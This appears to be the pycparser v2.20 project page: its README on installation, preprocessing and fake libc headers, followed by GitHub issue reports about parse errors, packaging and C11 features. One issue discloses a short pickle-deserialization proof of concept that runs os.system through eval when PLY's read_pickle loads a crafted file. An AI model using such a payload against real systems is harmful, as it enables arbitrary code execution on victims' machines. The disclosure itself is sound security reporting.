Complete C99 parser in pure Python

Overview

pycparser v2.20


1   Introduction

1.1   What is pycparser?

pycparser is a parser for the C language, written in pure Python. It is a module designed to be easily integrated into applications that need to parse C source code.

1.2   What is it good for?

Anything that needs C code to be parsed. The following are some uses for pycparser, taken from real user reports:

  • C code obfuscator
  • Front-end for various specialized C compilers
  • Static code checker
  • Automatic unit-test discovery
  • Adding specialized extensions to the C language

One of the most popular uses of pycparser is in the cffi library, which uses it to parse the declarations of C functions and types in order to auto-generate FFIs.

pycparser is unique in the sense that it's written in pure Python - a very high level language that's easy to experiment with and tweak. To people familiar with Lex and Yacc, pycparser's code will be simple to understand. It also has no external dependencies (except for a Python interpreter), making it very simple to install and deploy.

1.3   Which version of C does pycparser support?

pycparser aims to support the full C99 language (according to the standard ISO/IEC 9899). Some features from C11 are also supported, and patches to support more are welcome.

pycparser supports very few GCC extensions, but it's fairly easy to set things up so that it parses code with a lot of GCC-isms successfully. See the FAQ for more details.

1.4   What grammar does pycparser follow?

pycparser very closely follows the C grammar provided in Annex A of the C99 standard (ISO/IEC 9899).

1.5   How is pycparser licensed?

BSD license.

1.6   Contact details

For reporting problems with pycparser or submitting feature requests, please open an issue, or submit a pull request.

2   Installing

2.1   Prerequisites

  • pycparser was tested on Python 2.7, 3.4-3.6, on both Linux and Windows. It should work on any later version (in both the 2.x and 3.x lines) as well.
  • pycparser has no external dependencies. The only non-stdlib library it uses is PLY, which is bundled in pycparser/ply. The current PLY version is 3.10, retrieved from http://www.dabeaz.com/ply/

Note that pycparser (and PLY) uses docstrings for grammar specifications. Python installations that strip docstrings (such as when using the Python -OO option) will fail to instantiate and use pycparser. You can try to work around this problem by making sure the PLY parsing tables are pre-generated in normal mode; this isn't an officially supported/tested mode of operation, though.
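To make the docstring dependency concrete, here is a minimal sketch of the PLY-style convention, in which a rule function's docstring carries the grammar production. The names `p_expression_plus` and `read_rule` are hypothetical and are not taken from pycparser; the point is only that `__doc__` is `None` when docstrings are stripped.

```python
def p_expression_plus(p):
    """expression : expression PLUS term"""
    p[0] = p[1] + p[3]


def read_rule(func):
    # Return the grammar production stored in a rule function's docstring.
    # Under "python -OO" every __doc__ is None, so there is nothing to read.
    doc = func.__doc__
    if doc is None:
        raise RuntimeError(
            "no docstring on %s; was Python started with -OO?" % func.__name__
        )
    return doc.strip()
```

A grammar-driven tool that relies on this convention has no way to recover the production once the docstring is gone, which is why the parser cannot be built from scratch in that mode.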

2.2   Installation process

Installing pycparser is very simple. Once you download and unzip the package, you just have to execute the standard python setup.py install. The setup script will then place the pycparser module into site-packages in your Python's installation library.

Alternatively, since pycparser is listed in the Python Package Index (PyPI), you can install it using your favorite Python packaging/distribution tool, for example with:

> pip install pycparser

2.3   Known problems

  • Some users who've installed a new version of pycparser over an existing version ran into a problem using the newly installed library. This has to do with parse tables staying around as .pyc files from the older version. If you see unexplained errors from pycparser after an upgrade, remove it (by deleting the pycparser directory in your Python's site-packages, or wherever you installed it) and install again.

3   Using

3.1   Interaction with the C preprocessor

In order to be compilable, C code must be preprocessed by the C preprocessor - cpp. cpp handles preprocessing directives like #include and #define, removes comments, and performs other minor tasks that prepare the C code for compilation.

For all but the most trivial snippets of C code, pycparser, like a C compiler, must receive preprocessed C code in order to function correctly. If you import the top-level parse_file function from the pycparser package, it will interact with cpp for you, as long as it's in your PATH, or you provide a path to it.

Note also that you can use gcc -E or clang -E instead of cpp. See the using_gcc_E_libc.py example for more details. Windows users can download and install a binary build of Clang for Windows from this website.

3.2   What about the standard C library headers?

C code almost always #includes various header files from the standard C library, like stdio.h. While (with some effort) pycparser can be made to parse the standard headers from any C compiler, it's much simpler to use the provided "fake" standard includes in utils/fake_libc_include. These are standard C header files that contain only the bare necessities to allow valid parsing of the files that use them. As a bonus, since they're minimal, they can significantly improve the performance of parsing large C files.

The key point to understand here is that pycparser doesn't really care about the semantics of types. It only needs to know whether some token encountered in the source is a previously defined type. This is essential in order to be able to parse C correctly.

See this blog post for more details.
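The dependency on known type names can be illustrated with a toy tokenizer. This is a sketch of the idea only, not pycparser's lexer: `classify_tokens` and `C_KEYWORDS` are hypothetical names, and the typedef detection is deliberately naive (the last identifier before the `;` of a `typedef` statement becomes a type name).

```python
import re

C_KEYWORDS = {"typedef", "int", "char", "float", "struct"}
_IDENT = re.compile(r"[A-Za-z_]\w*")


def classify_tokens(source):
    # Tag each token as KEYWORD, TYPEID, ID, or PUNCT.
    typedef_names = set()
    tagged = []
    in_typedef = False
    last_ident = None
    for tok in re.findall(r"[A-Za-z_]\w*|\S", source):
        if tok in C_KEYWORDS:
            tagged.append(("KEYWORD", tok))
            if tok == "typedef":
                in_typedef = True
                last_ident = None
        elif _IDENT.fullmatch(tok):
            # The same spelling is a TYPEID only if a typedef introduced it.
            kind = "TYPEID" if tok in typedef_names else "ID"
            tagged.append((kind, tok))
            last_ident = tok
        else:
            tagged.append(("PUNCT", tok))
            if tok == ";" and in_typedef:
                if last_ident is not None:
                    typedef_names.add(last_ident)
                in_typedef = False
    return tagged
```

With this model, `T * x;` starts with a plain `ID` (so it reads as a multiplication), while the same text after `typedef int T;` starts with a `TYPEID` (so it reads as a pointer declaration). That is the distinction the fake headers exist to preserve.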

Note that the fake headers are not included in the pip package nor installed via setup.py (#224).
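A minimal sketch of combining the preprocessor with the fake headers follows. It assumes `gcc` is on your PATH and that `fake_libc_dir` points at utils/fake_libc_include inside a pycparser source checkout (the headers are not shipped by pip). The helper names `fake_libc_cpp_args` and `parse_with_fake_libc` are hypothetical; `parse_file` and its `use_cpp`, `cpp_path` and `cpp_args` parameters are the package's own.

```python
def fake_libc_cpp_args(fake_libc_dir, extra_args=()):
    # Build preprocessor arguments that add the fake headers to the include path.
    return ["-E", "-I" + fake_libc_dir] + list(extra_args)


def parse_with_fake_libc(c_path, fake_libc_dir, cpp_path="gcc"):
    # Imported lazily so the helper above can be used without pycparser.
    from pycparser import parse_file

    # Run the preprocessor on c_path, then parse its output into an AST.
    return parse_file(
        c_path,
        use_cpp=True,
        cpp_path=cpp_path,
        cpp_args=fake_libc_cpp_args(fake_libc_dir),
    )
```

Passing `cpp_path="clang"` should work the same way, since both compilers accept `-E` and `-I`.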

3.3   Basic usage

Take a look at the examples directory of the distribution for a few examples of using pycparser. These should be enough to get you started. Please note that most realistic C code samples would require running the C preprocessor before passing the code to pycparser; see the previous sections for more details.
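As a starting point, here is a short sketch that parses a C string that needs no preprocessing and lists the functions it defines. It is in the spirit of the bundled examples rather than a copy of one; `C_SOURCE` and `list_function_names` are names made up for this illustration.

```python
C_SOURCE = """
int add(int a, int b) { return a + b; }
int main(void) { return add(1, 2); }
"""


def list_function_names(source):
    # Return the names of all functions defined in a C source string.
    from pycparser import c_ast, c_parser

    class FuncDefVisitor(c_ast.NodeVisitor):
        def __init__(self):
            self.names = []

        def visit_FuncDef(self, node):
            # node.decl is the Decl node that holds the function's name.
            self.names.append(node.decl.name)

    ast = c_parser.CParser().parse(source, filename="<string>")
    visitor = FuncDefVisitor()
    visitor.visit(ast)
    return visitor.names
```

Calling `list_function_names(C_SOURCE)` walks the AST once; calling `ast.show()` on the parsed tree is a quick way to see which node types a visitor could hook into.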

3.4   Advanced usage

The public interface of pycparser is well documented with comments in pycparser/c_parser.py. For a detailed overview of the various AST nodes created by the parser, see pycparser/_c_ast.cfg.

There's also a FAQ available here. In any case, you can always drop me an email for help.

4   Modifying

There are a few points to keep in mind when modifying pycparser:

  • The code for pycparser's AST nodes is automatically generated from a configuration file - _c_ast.cfg, by _ast_gen.py. If you modify the AST configuration, make sure to re-generate the code.
  • Make sure you understand the optimized mode of pycparser - for that you must read the docstring in the constructor of the CParser class. For development you should create the parser without optimizations, so that it will regenerate the Yacc and Lex tables when you change the grammar.
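For development, the second point might look like the sketch below. `lex_optimize` and `yacc_optimize` are keyword arguments of the CParser constructor; `DEV_PARSER_OPTIONS` and `make_dev_parser` are hypothetical names. Check the constructor's docstring for the exact behavior in your version.

```python
# Keyword arguments that turn off the cached lexer and parser tables.
DEV_PARSER_OPTIONS = {"lex_optimize": False, "yacc_optimize": False}


def make_dev_parser():
    # Create a CParser that rebuilds its tables from the current grammar.
    from pycparser import c_parser

    return c_parser.CParser(**DEV_PARSER_OPTIONS)
```

Building the parser this way is slower, so it is best kept to development and test runs.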

5   Package contents

Once you unzip the pycparser package, you'll see the following files and directories:

README.rst:
This README file.
LICENSE:
The pycparser license
setup.py:
Installation script
examples/:
A directory with some examples of using pycparser
pycparser/:
The pycparser module source code.
tests/:
Unit tests.
utils/fake_libc_include:
Minimal standard C library include files that should allow parsing any C code.
utils/internal/:
Internal utilities for my own use. You probably don't need them.

6   Contributors

Some people have contributed to pycparser by opening issues on bugs they've found and/or submitting patches. The list of contributors is in the CONTRIBUTORS file in the source distribution. After pycparser moved to GitHub I stopped updating this list because GitHub does a much better job at tracking contributions.

Issues
  • Don't fail if docstrings are disabled


    The attribute __doc__ will return None if running CPython in -OO mode as it discards docstrings.

    FYI, this broke builds for me because cryptography uses cffi which uses pycparser at install time, and always pulls the latest version regardless of any dependency pinning in requirements.txt. It would be nice to prioritize this getting in a release ASAP to fix this issue.

    opened by dsanders11 29
  • pycparser-2.14-py2.py3-none-any.whl causes AssertionError: sorry, but this version only supports 100 named groups


    It looks like pycparser-2.14-py2.py3-none-any.whl is broken or misconfigured, while pycparser-2.14.tar.gz is fine. After installing the Snowflake Connector for Python (a connector for Snowflake DB), this error occurs:

    >pip install -U snowflake-connector-python
    >python -c "import snowflake.connector"
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
      File "/tmp/t/lib/python2.7/site-packages/snowflake/connector/__init__.py", line 21, in <module>
        from .connection import SnowflakeConnection
      File "/tmp/t/lib/python2.7/site-packages/snowflake/connector/connection.py", line 16, in <module>
        from .cursor import SnowflakeCursor
      File "/tmp/t/lib/python2.7/site-packages/snowflake/connector/cursor.py", line 30, in <module>
        from .file_transfer_agent import (SnowflakeFileTransferAgent)
      File "/tmp/t/lib/python2.7/site-packages/snowflake/connector/file_transfer_agent.py", line 29, in <module>
        from .s3_util import (SnowflakeS3FileEncryptionMaterial, SnowflakeS3Util,
      File "/tmp/t/lib/python2.7/site-packages/snowflake/connector/s3_util.py", line 25, in <module>
        from Crypto.Cipher import AES
      File "/tmp/t/lib/python2.7/site-packages/Crypto/Cipher/__init__.py", line 78, in <module>
        from Crypto.Cipher._mode_ecb import _create_ecb_cipher
      File "/tmp/t/lib/python2.7/site-packages/Crypto/Cipher/_mode_ecb.py", line 29, in <module>
        from Crypto.Util._raw_api import (load_pycryptodome_raw_lib,
      File "/tmp/t/lib/python2.7/site-packages/Crypto/Util/_raw_api.py", line 89, in <module>
        Array = ffi.new("char[1]").__class__.__bases__
      File "/tmp/t/lib/python2.7/site-packages/cffi/api.py", line 248, in new
        cdecl = self._typeof(cdecl)
      File "/tmp/t/lib/python2.7/site-packages/cffi/api.py", line 168, in _typeof
        result = self._typeof_locked(cdecl)
      File "/tmp/t/lib/python2.7/site-packages/cffi/api.py", line 153, in _typeof_locked
        type = self._parser.parse_type(cdecl)
      File "/tmp/t/lib/python2.7/site-packages/cffi/cparser.py", line 448, in parse_type
        return self.parse_type_and_quals(cdecl)[0]
      File "/tmp/t/lib/python2.7/site-packages/cffi/cparser.py", line 451, in parse_type_and_quals
        ast, macros = self._parse('void __dummy(\n%s\n);' % cdecl)[:2]
      File "/tmp/t/lib/python2.7/site-packages/cffi/cparser.py", line 260, in _parse
        ast = _get_parser().parse(csource)
      File "/tmp/t/lib/python2.7/site-packages/cffi/cparser.py", line 40, in _get_parser
        _parser_cache = pycparser.CParser()
      File "/tmp/t/lib/python2.7/site-packages/pycparser/c_parser.py", line 87, in __init__
        outputdir=taboutputdir)
      File "/tmp/t/lib/python2.7/site-packages/pycparser/c_lexer.py", line 66, in build
        self.lexer = lex.lex(object=self, **kwargs)
      File "/tmp/t/lib/python2.7/site-packages/pycparser/ply/lex.py", line 911, in lex
        lexobj.readtab(lextab, ldict)
      File "/tmp/t/lib/python2.7/site-packages/pycparser/ply/lex.py", line 233, in readtab
        titem.append((re.compile(pat, lextab._lexreflags | re.VERBOSE), _names_to_funcs(func_name, fdict)))
      File "/tmp/t/lib/python2.7/re.py", line 194, in compile
        return _compile(pattern, flags)
      File "/tmp/t/lib/python2.7/re.py", line 249, in _compile
        p = sre_compile.compile(pattern, flags)
      File "/tmp/t/lib/python2.7/sre_compile.py", line 583, in compile
        "sorry, but this version only supports 100 named groups"
    AssertionError: sorry, but this version only supports 100 named groups
    

    But if I install it from the source archive pycparser-2.14.tar.gz, it works:

    >pip install -U ~/Downloads/pycparser-2.14.tar.gz
    Processing /Users/stakeda/Downloads/pycparser-2.14.tar.gz
    Building wheels for collected packages: pycparser
      Running setup.py bdist_wheel for pycparser ... done
      Stored in directory: /Users/stakeda/Library/Caches/pip/wheels/6e/f1/96/de2b8478c77d89fe540a5709a70e2cdc4e7331a3543cada3c1
    Successfully built pycparser
    Installing collected packages: pycparser
      Found existing installation: pycparser 2.13
        Uninstalling pycparser-2.13:
          Successfully uninstalled pycparser-2.13
    Successfully installed pycparser-2.14
    >python -c "import snowflake.connector"
    >
    

    Could you rebuild a new wheel or remove it? Thanks.

    opened by smtakeda 18
  • Fix parsing TYPEIDs in declarators


    This fixes the parsing of TYPEIDs in declarators (and related expressions) once and for all, removing existing workarounds for specific cases of the problem. In particular, it solves the problem in the current parser where a TYPEID is used in a list of multiple declarators, for which there is no workaround.

    All tests are passing for me, and I added 2 more tests related to parsing declarators correctly.

    I've tried to organize the commits as logically and discretely as possible to make it clear what is happening in each step:

    1. Remove workaround productions
    2. Allow TYPEIDs in declarators
    3. Restrict declaration-specifiers and specifier-qualifier-list to contain at least one type-specifier, and only one if it is a typedef-name
    4. Force parameter-declarations to interpret a TYPEID as a typedef-name in cases of ambiguity

    It is likely there is some more leftover "workaround" code that can be removed, but I decided it was best to do the PR as-is for now, as that may take some careful thought (and maybe more tests to ensure no change in behavior).

    opened by natezb 16
  • Implement `_Atomic` support


    As mentioned in https://github.com/eliben/pycparser/pull/428 we need _Atomic keyword support for C11. This keyword is rather special, as it can be both a qualifier and a specifier. C standard provides two grammar definitions for this:

    (6.7.2) type-specifier:
      void
      char
      short
      int
      long
      float
      double
      signed
      unsigned
      _Bool
      _Complex
      atomic-type-specifier
      struct-or-union-specifier
      enum-specifier
      typedef-name
    
    (6.7.2.4) atomic-type-specifier:
      _Atomic ( type-name )
    
    (6.7.3) type-qualifier:
      const
      restrict
      volatile
      _Atomic
    

    Depending on whether the _Atomic keyword is a specifier or a qualifier it refers to an atomic type. The atomic type can contain another atomic type, i.e. define nested atomic types, and it can also refer to specific parts of the type. As mentioned in the original PR all the following examples are valid:

    _Atomic(int *) a;
    _Atomic(int) *b;
    _Atomic int *c;
    

    All these samples need to generate different code after being parsed through pycparser and converted back to C, so the implementation needs to treat the _Atomic qualifier and the _Atomic specifier separately. My suggestion is to follow the grammar of the C standard: use a normal qualifier for the _Atomic qualifier, and a dedicated class for the specifier, as is done for enum.

    opened by vit9696 14
  • Publish sdist and bdist wheel


    The benefits of wheels are well documented; see https://pythonwheels.com/. This package is pure Python, and publishing it as both source and as a wheel is simple.

    Would you accept a contribution to add a Makefile to this repo that would allow you to build both a source distribution (sdist) and a built distribution (wheel)?

    opened by groodt 14
  • pycparser 2.18+ break pygit2


    ____________________ ERROR collecting test/test_archive.py _____________________
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/api.py:174: in _typeof
        result = self._parsed_types[cdecl]
    E   KeyError: 'int (*git_transport_certificate_check_cb)(git_cert *cert, int valid, const char *host, void *payload)'
    During handling of the above exception, another exception occurred:
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/cparser.py:276: in _parse
        ast = _get_parser().parse(fullcsource)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/pycparser/c_parser.py:152: in parse
        debug=debuglevel)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/pycparser/ply/yacc.py:331: in parse
        return self.parseopt_notrack(input, lexer, debug, tracking, tokenfunc)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/pycparser/ply/yacc.py:1199: in parseopt_notrack
        tok = call_errorfunc(self.errorfunc, errtoken, self)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/pycparser/ply/yacc.py:193: in call_errorfunc
        r = errorfunc(token)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/pycparser/c_parser.py:1848: in p_error
        column=self.clex.find_tok_column(p)))
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/pycparser/plyparser.py:67: in _parse_error
        raise ParseError("%s: %s" % (coord, msg))
    E   pycparser.plyparser.ParseError: <cdef source string>:2:7: before: git_transport_certificate_check_cb
    During handling of the above exception, another exception occurred:
    test/test_archive.py:36: in <module>
        from pygit2 import Index, Oid, Tree, Object
    pygit2/__init__.py:41: in <module>
        from .remote import Remote, RemoteCallbacks, get_credentials
    pygit2/remote.py:73: in <module>
        class RemoteCallbacks(object):
    pygit2/remote.py:315: in RemoteCallbacks
        @ffi.callback('int (*git_transport_certificate_check_cb)'
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/api.py:382: in callback
        cdecl = self._typeof(cdecl, consider_function_as_funcptr=True)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/api.py:177: in _typeof
        result = self._typeof_locked(cdecl)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/api.py:162: in _typeof_locked
        type = self._parser.parse_type(cdecl)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/cparser.py:476: in parse_type
        return self.parse_type_and_quals(cdecl)[0]
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/cparser.py:479: in parse_type_and_quals
        ast, macros = self._parse('void __dummy(\n%s\n);' % cdecl)[:2]
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/cparser.py:278: in _parse
        self.convert_pycparser_error(e, csource)
    ../../../virtualenv/python3.4.6/lib/python3.4/site-packages/cffi/cparser.py:307: in convert_pycparser_error
        raise CDefError(msg)
    E   cffi.error.CDefError: cannot parse "int (*git_transport_certificate_check_cb)(git_cert *cert, int valid, const char *host, void *payload)"
    E   <cdef source string>:2:7: before: git_transport_certificate_check_cb
    

    I'm pretty sure somebody did report a bug, but I can't find it..

    opened by ignatenkobrain 13
  • read_pickle method is vulnerable


    import pickle
    class joel_test(object):
        def __reduce__(self):
            return eval, ("os.system('calc.exe')",)
    test = joel_test()
    f=open('joel_test','wb')
    pickle.dump(test,f)
    f.close()
    joel=LRTable()
    joel.read_pickle('joel_test')
    

    Hi, there is a vulnerability in the read_pickle method in yacc.py; please see the PoC above. It can execute arbitrary Python code, resulting in command execution.

    opened by Joel-MalwareBenchmark 12
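One general mitigation for this class of problem, following the "restricting globals" pattern from the Python pickle documentation, is to refuse to resolve any global that is not explicitly allowed. The sketch below is not what PLY or pycparser does; `SAFE_BUILTINS`, `RestrictedUnpickler` and `restricted_loads` are illustrative names, and the allow-list is an assumption about what a table file would need.

```python
import builtins
import io
import pickle

# Only these builtins may be looked up while unpickling.
SAFE_BUILTINS = {"dict", "list", "set", "tuple", "str", "int"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle stream asks for (e.g. eval).
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name)
        )


def restricted_loads(data):
    # Like pickle.loads, but rejects globals outside the allow-list.
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers of strings and numbers still load, while a payload whose `__reduce__` returns `eval` is rejected before anything is called. Loading pickles only from trusted locations remains the primary defense.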
  • Support for Weakref in __slots__


    Hello, I see you added support for the __slots__ mechanism in the AST. Nice. However, this breaks cffi downstream, since they use weak references to Enum, etc. objects (see their cparser.py file). In turn this breaks petlib, which I maintain. I think the solution is to include "__weakref__" in the __slots__ list of fields, as per the advice at: https://docs.python.org/2/reference/datamodel.html#slots

    Many thanks, George

    bug 
    opened by gdanezis 11
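The behavior behind this report can be reproduced with the standard library alone. In the sketch below, `SlottedNode`, `WeakrefableNode` and `can_weakref` are stand-in names, not pycparser classes.

```python
import weakref


class SlottedNode(object):
    __slots__ = ("name",)  # no __weakref__ slot, so no weak references

    def __init__(self, name):
        self.name = name


class WeakrefableNode(object):
    __slots__ = ("name", "__weakref__")  # explicitly re-enables weak references

    def __init__(self, name):
        self.name = name


def can_weakref(obj):
    # Return True if a weak reference to obj can be created.
    try:
        weakref.ref(obj)
    except TypeError:
        return False
    return True
```

Adding `"__weakref__"` costs one extra slot per instance, which keeps most of the memory benefit of `__slots__`.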
  • Redeclared types


    While using pycparser to parse a large, existing codebase, I immediately came upon the typedef-name problem. The changes in this pull request resolve and test for the issues encountered; in particular:

    • Reusing typedef names as structure/union member names
    • Reusing typedef names as variable names in inner scopes
    • Reusing typedef names as parameter names in declarations and definitions
    • Duplicated typedef declarations (non-standard, but apparently common and syntactically similar to the above)

    There is a corner case regarding parameter name scoping that required access to yacc.py's lookahead token (see p_direct_declarator_5 in c_parser.py for details). There are three solutions as I see it:

    • Modify yacc.py to expose the lookahead token as an attribute of the parser (...but requiring future PLY updates to be merged, not copied)
    • Keep track of the most-recent token via a custom tokenfunc (...but trusting that the parser's lookaheadstack is empty)
    • Use the inspect module to grab the value of the parser's lookahead variable (...but direct inspection of Python frames and local dictionaries is pretty evil)

    For the purpose of this change I decided to use the inspect module, as it is the least error-prone (it can inspect lookaheadstack to ensure it's empty) and the least invasive to the codebase. I can instead make lookahead/lookaheadstack attributes, if you're willing to support the merging of PLY.

    opened by Syeberman 11
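The frame-inspection technique mentioned in this pull request can be sketched in isolation. This is not the code from the PR: `peek_local`, `toy_parse` and `report_lookahead` are hypothetical, and `toy_parse` merely stands in for a parser loop that keeps its lookahead token in a local variable.

```python
import inspect


def peek_local(name, depth=1):
    # Return a local variable from a frame `depth` levels above the caller.
    frame = inspect.currentframe()
    try:
        for _ in range(depth):
            frame = frame.f_back
        return frame.f_locals[name]
    finally:
        del frame  # avoid keeping a reference cycle through the frame


def toy_parse(tokens, on_token):
    # Stand-in for a parser loop; `lookahead` is only ever a local here.
    results = []
    for index, token in enumerate(tokens):
        lookahead = tokens[index + 1] if index + 1 < len(tokens) else None
        results.append(on_token(token))
    return results


def report_lookahead(token):
    # depth=2: skip this function's own frame and read toy_parse's locals.
    return (token, peek_local("lookahead", depth=2))
```

For example, `toy_parse(["int", "x", ";"], report_lookahead)` pairs each token with the one that follows it. The approach depends on the variable name and call depth staying stable, which is the fragility the PR description acknowledges.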
  • ParseError while using gcc_E_lib example to parse my C code


    Trying to parse the following c file

    #include <stdio.h>
    #include <stdlib.h>
    #include <ctype.h>
    
    #define  MaxElements 16
    
    typedef float HeapElementType;
    
    typedef  struct {
         HeapElementType key;
    } HeapNode;
    
    typedef struct {
            int Size;
            HeapNode Element[MaxElements+1];
    } HeapType;
    
    typedef enum {
        FALSE, TRUE
    } boolean;
    
    void CreateMinHeap(HeapType *Heap);
    boolean FullHeap(HeapType Heap);
    void InsertMinHeap(HeapType *Heap, HeapNode Item);
    boolean EmptyHeap(HeapType Heap);
    void DeleteMinHeap(HeapType *Heap, HeapNode *Item);
    void PrintHeap(HeapType Heap);
    
    int main()
    {
        HeapType AHeap;
        HeapNode AnItem;
        int m;
        FILE *fp;
    
        printf("Give m: ");
        scanf("%d", &m);
    
        CreateMinHeap(&AHeap);
    
        fp=fopen("transactions.txt","r");
    
        while(!feof(fp))
        {
            fscanf(fp, "%f", &AnItem.key);
            InsertMinHeap(&AHeap, AnItem);
            if(AHeap.Size>m)
                DeleteMinHeap(&AHeap, &AnItem);
        }
    
        PrintHeap(AHeap);
    
        printf("Transactions\n");
        while(!EmptyHeap(AHeap))
        {
            DeleteMinHeap(&AHeap, &AnItem);
            printf("%.2f ", AnItem.key);
        }
    
        return 0;
    }
    
    void CreateMinHeap(HeapType *Heap)
    {
      (*Heap).Size=0;
    }
    
    boolean EmptyHeap(HeapType Heap)
    {
      return (Heap.Size==0);
    }
    
    boolean FullHeap(HeapType Heap)
    {
      return (Heap.Size==MaxElements);
    }
    
    
    void PrintHeap(HeapType Heap)
    {
        int i;
        printf("Data Structure size =%d\n", Heap.Size);
        for(i=1;i<=Heap.Size;i++)
            printf("%.2f ", Heap.Element[i].key);
        printf("\n");
    }
    
    

    and get this error

    _error
        raise ParseError("%s: %s" % (coord, msg))
    pycparser.plyparser.ParseError: /usr/lib/gcc/x86_64-pc-linux-gnu/11.1.0/include/stdarg.h:40:27: before: __gnuc_va_list

    opened by tassosblackg 10
  • offsetof() support is incomplete


    pycparser 2.13 added support for offsetof, and it is listed in the CHANGES file as "offsetof() the way gcc implements it". However, there are two differences between gcc's implementation and pycparser's.

    The important one: pycparser defines the syntax for offsetof() as

            primary_expression  : OFFSETOF LPAREN type_name COMMA identifier RPAREN
    

    but gcc defines it as

         primary:
                 "__builtin_offsetof" "(" typename "," offsetof_member_designator ")"
    
         offsetof_member_designator:
                   identifier
                 | offsetof_member_designator "." identifier
                 | offsetof_member_designator "[" expr "]"
    
    

    The less important one (also visible above) is that gcc supports spelling offsetof as __builtin_offsetof.

    opened by shai-xio 10
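To show what the gcc-style designator grammar quoted above accepts, here is a small hand-written recognizer for it. It is a sketch, not a proposed patch: `parse_member_designator` is a hypothetical name, and the `expr` inside brackets is simplified to a non-negative integer literal.

```python
import re

_TOKEN = re.compile(r"\s*([A-Za-z_]\w*|\d+|[.\[\]])")
_IDENT = re.compile(r"[A-Za-z_]\w*")


def parse_member_designator(text):
    # Parse identifier ( "." identifier | "[" integer "]" )* into a step list.
    text = text.rstrip()
    tokens, pos = [], 0
    while pos < len(text):
        match = _TOKEN.match(text, pos)
        if match is None:
            raise ValueError("unexpected character at offset %d" % pos)
        tokens.append(match.group(1))
        pos = match.end()

    if not tokens or not _IDENT.fullmatch(tokens[0]):
        raise ValueError("designator must start with an identifier")
    steps = [("member", tokens[0])]
    i = 1
    while i < len(tokens):
        rest = tokens[i:i + 3]
        if len(rest) >= 2 and rest[0] == "." and _IDENT.fullmatch(rest[1]):
            steps.append(("member", rest[1]))
            i += 2
        elif (len(rest) == 3 and rest[0] == "["
              and rest[1].isdigit() and rest[2] == "]"):
            steps.append(("index", int(rest[1])))
            i += 3
        else:
            raise ValueError("unexpected token %r" % tokens[i])
    return steps
```

The single-identifier form that pycparser 2.13 accepts corresponds to a result with exactly one step; designators such as `a.b[3].c` are what the issue asks to add.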
  • Named initializer AST is ambiguous for [ENUMERATOR] = ... vs .prop = ...


    struct A { int x; };
    struct A a = {
        .x = 1
    };
    

    and

    enum { x };
    int a[] = {
        [x] = 1
    };
    

    both result in a Decl with

    init=InitList(exprs=[NamedInitializer(name=[ID(name='x')],
                                          expr=Constant(type='int', value='1'))]),
    

    (The serializer chooses to emit .x = 1 in this case.)

    patches-welcome 
    opened by simonlindholm 0
  • Error using pycparser with C code that calls OpenSSL


    Hi,

    I'm trying to use pycparser with an application that uses OpenSSL. Concretely, I'm using the OpenSSL digest demo in https://github.com/openssl/openssl/blob/master/demos/digest/EVP_MD_xof.c.

    I'm pre-processing the file with the command gcc -I../../include -I../../../pycparser/utils/fake_libc_include -E EVP_MD_xof.c, where the first include refers to the OpenSSL libraries and the second include refers to pycparser itself. Then, when trying to parse the file using the parse_file command, I get the error

    Traceback (most recent call last):
      File "/Users/vm2p/Documents/repositories/pycparser/examples/rewrite_ast.py", line 25, in <module>
        ast = parse_file("/Users/vm2p/Documents/repositories/openssl/demos/digest/test.c", use_cpp=True)
      File "/usr/local/lib/python3.9/site-packages/pycparser/__init__.py", line 90, in parse_file
        return parser.parse(text, filename)
      File "/usr/local/lib/python3.9/site-packages/pycparser/c_parser.py", line 147, in parse
        return self.cparser.parse(
      File "/usr/local/lib/python3.9/site-packages/pycparser/ply/yacc.py", line 331, in parse
        return self.parseopt_notrack(input, lexer, debug, tracking, tokenfunc)
      File "/usr/local/lib/python3.9/site-packages/pycparser/ply/yacc.py", line 1199, in parseopt_notrack
        tok = call_errorfunc(self.errorfunc, errtoken, self)
      File "/usr/local/lib/python3.9/site-packages/pycparser/ply/yacc.py", line 193, in call_errorfunc
        r = errorfunc(token)
      File "/usr/local/lib/python3.9/site-packages/pycparser/c_parser.py", line 1931, in p_error
        self._parse_error(
      File "/usr/local/lib/python3.9/site-packages/pycparser/plyparser.py", line 67, in _parse_error
        raise ParseError("%s: %s" % (coord, msg))
    pycparser.plyparser.ParseError: ../../include/openssl/safestack.h:205:256: before: (
    

    I opened the safestack.h file from the OpenSSL distribution and between lines 250 and 256 there are a bunch of macro definitions. I've attached such file to this issue. Is this something that is not supported by pycparser? Or am I doing something wrong? I also attached the EVP_MD_xof.c as test.c.

    I also tried to pre-process the file using just gcc -I../../include -E EVP_MD_xof.c, but then I get

    Traceback (most recent call last):
      File "/Users/vm2p/Documents/repositories/pycparser/examples/rewrite_ast.py", line 25, in <module>
        ast = parse_file("/Users/vm2p/Documents/repositories/openssl/demos/digest/test.c", use_cpp=True)
      File "/usr/local/lib/python3.9/site-packages/pycparser/__init__.py", line 90, in parse_file
        return parser.parse(text, filename)
      File "/usr/local/lib/python3.9/site-packages/pycparser/c_parser.py", line 147, in parse
        return self.cparser.parse(
      File "/usr/local/lib/python3.9/site-packages/pycparser/ply/yacc.py", line 331, in parse
        return self.parseopt_notrack(input, lexer, debug, tracking, tokenfunc)
      File "/usr/local/lib/python3.9/site-packages/pycparser/ply/yacc.py", line 1199, in parseopt_notrack
        tok = call_errorfunc(self.errorfunc, errtoken, self)
